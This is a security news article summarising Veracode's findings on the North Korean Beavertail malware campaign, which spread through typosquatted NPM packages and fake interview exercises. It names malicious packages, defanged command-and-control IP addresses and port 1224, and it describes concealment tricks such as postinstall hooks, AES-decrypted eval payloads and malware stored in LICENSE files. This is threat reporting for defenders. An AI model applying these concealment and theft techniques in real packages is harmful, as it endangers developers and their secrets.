Beavertail Malware Returns: North Korean Hackers Use NPM Packages to Steal Crypto & Secrets
Do Son 
Veracode Threat Research has released an update on an ongoing North Korean cyber-espionage campaign that is actively targeting developers using malicious NPM packages to steal cryptocurrency and sensitive information. The latest wave, tied to the Beavertail malware family, is a continuation of malicious operations first reported in early 2024, but with evolved techniques, new payloads, and expanding infrastructure.
“Our continuous monitoring systems recently flagged four suspicious packages… but our investigation uncovered and we subsequently blocked a total of twelve malicious packages,” Veracode noted.
The attackers strategically published malicious NPM packages like cloud-binary, json-cookie-csv, cloudmedia, and nodemailer-enhancer—some as typosquats of legitimate libraries such as cloudinary. These packages triggered malware downloads through postinstall scripts and obfuscated payloads hidden deep in the node_modules folder.
Even more disturbingly, the malware was triggered during unit tests, simulating real-world developer interview tasks to steal secrets and credentials from candidates’ machines.
“This malware campaign targets developers to trick them into installing malware during an interview exercise… in an apparent attempt to continue to fund the sanctioned country with stolen cryptocurrency.”
The malware observed is believed to be a third variant of the Beavertail malware, capable of targeting Windows, macOS, and Linux systems. The decrypted payloads were delivered via AES-256 encrypted files and obfuscated JavaScript using custom keys and IVs.
In one package, cloud-binary, the malware ran an AES-decryption function stored in parse.js, immediately followed by an eval() of the decrypted string, executing the attack logic:
Capabilities included:
- Enumeration of host information
- Theft of crypto wallets, browser extensions, and system files
- Exfiltration of documents, credentials, environment variables, screenshots, and password databases (Keychain)
- Download and execution of Python-based second-stage payloads
- Real-time command execution via WebSocket C2 channels
- VM and sandbox evasion techniques
Veracode discovered heavy reuse of:
- Port 1224 for command-and-control communication
- Static AES keys and IVs
- Identical encryption schemes across packages
- Shared infrastructure like hxxp://144.172.105[.]235 and hxxp://135.181.123[.]177
One variant, nodemailer-enhancer, even stored the malware payload inside a LICENSE file and an obfuscated LICENSE(old) file—an unusual tactic meant to evade review. These files were decrypted with unique but recognizable AES configurations, further pointing to centralized attacker tooling.
“It appears this malware is under development…This package was found to contain two Beavertail configurations.”
Thanks to Veracode’s Package Firewall technology, most of the malicious packages were automatically detected and blocked before they could spread further. However, eight encrypted and eight non-encrypted variants were found in total, including:
- bingo-logger, succgdess, react-smooth-plugin, json-cookie-jar
- react-router-scroll-navar, rc-logger, preset-log, and others
Veracode notified NPM, and the malicious packages were promptly removed from the ecosystem.
Related Posts:
- North Korean APT Lazarus Uses Malicious npm Package to Target Developers
- North Korean Hackers Launch Job Interview Scam to Deploy BeaverTail and InvisibleFerret Malware
- Developers Targeted: North Korean Hackers Deploy “BeaverTail” Malware via NFTs
- Cyber Espionage Campaign: North Korean Actors Deploy BeaverTail and InvisibleFerret
- North Korean Threat Actors Targeting Tech Job Seekers with Contagious Interview Campaign
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
